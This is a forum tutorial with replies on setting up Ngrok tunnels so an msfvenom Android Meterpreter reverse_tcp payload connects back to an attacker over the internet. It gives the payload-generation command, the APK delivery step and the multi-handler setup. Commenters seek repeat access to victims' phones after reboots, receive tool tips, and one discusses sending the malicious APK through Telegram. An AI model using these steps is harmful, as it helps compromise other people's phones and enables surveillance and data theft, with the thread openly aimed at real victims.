How To Setup Port Forwarding For Msfvenom Android Payloads (WAN)

Video Tutorial

# What is Ngrok?

Ngrok is a tunneling, reverse proxy system that establishes secure tunnels from a public endpoint such as the internet to a locally running network service while capturing all traffic for detailed inspection and replay.

So it allows you to expose a port on your computer on the internet, and because it is a reverse proxy it does not expose your IP, it provides you with a URL.

It is most popularly used by Web developers, exposing their local host/web server on the internet to share with others or test.

# Issues with traditional Port forwarding

  • Many individuals have a static IP or have only one IP assigned to them by their ISP.
  • Do not have access to their router admin page - I have made a video on how to do this manually.
  • Real port forwarding exposes your computer completely, with your IP

# Advantages of Ngrok

  • Free
  • Create TCP Tunnels
  • Multiple Tunnels simultaneously

# Setting up Ngrok

  • Visit website
  • Create Account
  • Download executable
  • Unzip
  • Get Auth token from the site and execute the command
  • Run binary

# Getting started

  • ./ngrok tcp 1234
  • Host - to get IP (Not interacting with URL’s)
  • Msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R > /root/desktop/Payload.apk
  • Copy apk to web server and download on device
  • Start multi handler and set payload
  • Set LHOST
  • Set LPORT 1234
  • Run
  • Bam!

hello guy
your video was great.I tested it before and I found that its the only way for me to have an over wan attack because my ISP do not let me to forward any port. ngrok is the only way to bypass this. but there is a really big problem with ngrok. you can only use it one time because every time you start ngrok again it will give you a different port so you have to make another payload with a different port number. and you have to give the payload to the victim again which is so hard. with simple port forwarding you always have one port so you can access to victims cellphone again and again until the payload is in the victims there anyway to connect to the same payload after restarting the computer in another day. please help. I tried so hard but i failed so please help me its a serious problem.

1 Like

@SmohammadH this has been implemented into Ngrok using the remote port option in configuration. Here is documentation on this subject . Hope this solves your issue.


Can you tell some tool for permanent port forwarding that will help me to attack a android after we restarting our computer. Also tell me some tips to exploit android after we restarted our pc

1 Like

Pupy works great on android. Ngrok remote port works for port forwarding for what you ask.

1 Like

So, I followed the video,
create ZZZ.apk
when I open it directly in an Android emulator (Nox) -> it is working perfectly
when I send it with Telegram ( it’s like WhatsApp) and open it in NoxPlayer … [ I live in Iran, Telegram has been filtered by the government, obviously we all use VPN to use it ] … if the VPN is disconnected it would work, otherwise nope.
is it because of the VPN ?
has anyone test it out with Telegram !
I think, WhatsApp won’t allow us to send a malicious .apk file.
thanks in advance.